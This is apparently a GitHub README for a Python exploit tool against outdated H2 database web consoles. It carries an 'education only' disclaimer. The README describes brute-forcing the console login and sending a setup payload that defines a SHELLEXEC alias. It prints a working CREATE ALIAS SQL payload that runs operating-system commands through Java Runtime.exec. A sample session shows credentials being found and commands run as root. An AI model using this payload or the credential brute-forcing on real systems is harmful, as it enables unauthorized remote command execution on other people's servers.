cExplr/H2_RCE_Exploit
H2_RCE Exploit


==========================================================================================================================
==========================================================================================================================
THIS IS FOR EDUCATION PURPOSES ONLY. PLEASE DO NOT USE THIS ON ANY REAL SYSTEMS AROUND YOU, AND DON'T EVEN THINK ABOUT IT.
PLEASE BE RESPONSIBLE AND ETHICAL. BE REMINDED THAT IF YOU ARE CAUGHT, YOU WILL BE IN GRAVE TROUBLE. THE H2 DATABASE HAS
VERY QUICKLY PATCHED THIS VULNERABILITY!
==========================================================================================================================
==========================================================================================================================

If the H2 web console is reached over SSH port forwarding, the URL entered for the database must be http://localhost:XXXX, where XXXX is the forwarded local port. The console only listens on localhost unless it was started with -webAllowOthers, so forwarding is the usual way to reach a remote instance.

A list of usernames and passwords is provided in case the password is unknown and has to be brute-forced. Edit the lists in the script if you want to use your own wordlist.

Once credentials are confirmed, a setup payload is sent once to define the function used for executing commands. From then on, each command you enter is sent as a query of the form CALL SHELLEXEC('<command>') and its output is printed back to you. Defining that function needs admin rights on the database (the default sa account has them), which is why the credential check comes first.

TO EXIT GRACEFULLY, JUST TYPE "EXIT"
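For readers who want to see what the two steps above amount to at the SQL level, here is the shape of the alias-based technique from the referenced write-up, as an added example and not the payload taken from this repository's script. The alias name SHELLEXEC matches the tool's output; the Java body is an assumption about what the setup payload defines.

```sql
-- Added example (not the repository's own code): the CREATE ALIAS technique the
-- tool relies on. Assumed Java body; only the alias name SHELLEXEC is taken from
-- the tool's output.

-- Step 1 ("setup payload"): define a Java function inside the database.
-- CREATE ALIAS requires admin rights on the database, so the sa (or another
-- admin) credential found in the previous step is what makes this possible.
-- The $$ ... $$ dollar quoting lets the Java source contain quotes unescaped.
CREATE ALIAS IF NOT EXISTS SHELLEXEC AS $$
String shellexec(String cmd) throws java.io.IOException {
    // run the command and read everything it writes to stdout
    java.util.Scanner s = new java.util.Scanner(
        Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A");
    return s.hasNext() ? s.next() : "";
}
$$;

-- Step 2 (every later "Enter command -->"): the alias is already defined for the
-- session, so each command is just a call; this is why the tool does not need
-- to resend step 1 before each query.
CALL SHELLEXEC('id');
```

Step 1 only needs to succeed once per database; if the alias already exists, IF NOT EXISTS keeps the setup query from failing on a second run against the same instance.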

EXAMPLE :

root@kali:~# python h2_RCE.py
[*] Start Exploiting outdated H2 ? 
[*] Press any key to Continue ...
[*] Enter url for the database : http://localhost:8113
[*] Testing for credentials ... 
[*] Obtaining new jsessionId ...
locationref : login.jsp?jsessionid=c5e0ef021f98c37328803e6c9f777e65
jsessionid : c5e0ef021f98c37328803e6c9f777e65
[*] Testing username : sa , password : 12345
===================================================================
Attempt to connect to  http://localhost:8113/login.do?jsessionid=c5e0ef021f98c37328803e6c9f777e65

[+] Credentials found!

USERNAME : sa
PASSWORD : 12345


================================================================


[+] LOGGED IN SUCCESSFULLY
[+] Credentials Confirmed!


[*] Preparing to send payload ... 
[*] Setting up payload : ... 
[+] Query URL : http://localhost:8113/query.do?jsessionid=c5e0ef021f98c37328803e6c9f777e65
[*] Sending Payload To Setup ...
[+] Attempt for payload setup done
Enter command --> id
call SHELLEXEC('id')
[*]Executing id

=========================================

id

 uid=0(root) gid=0(root) groups=0(root)

=========================================



Enter command --> EXIT
Stopping Exploitation ... 

REFERENCES


https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html

Based on the code from searchsploit exploits/java/local/44422.py

Rewritten by me to continuously get commands without needing to continuously resend the payload or rerun the program.

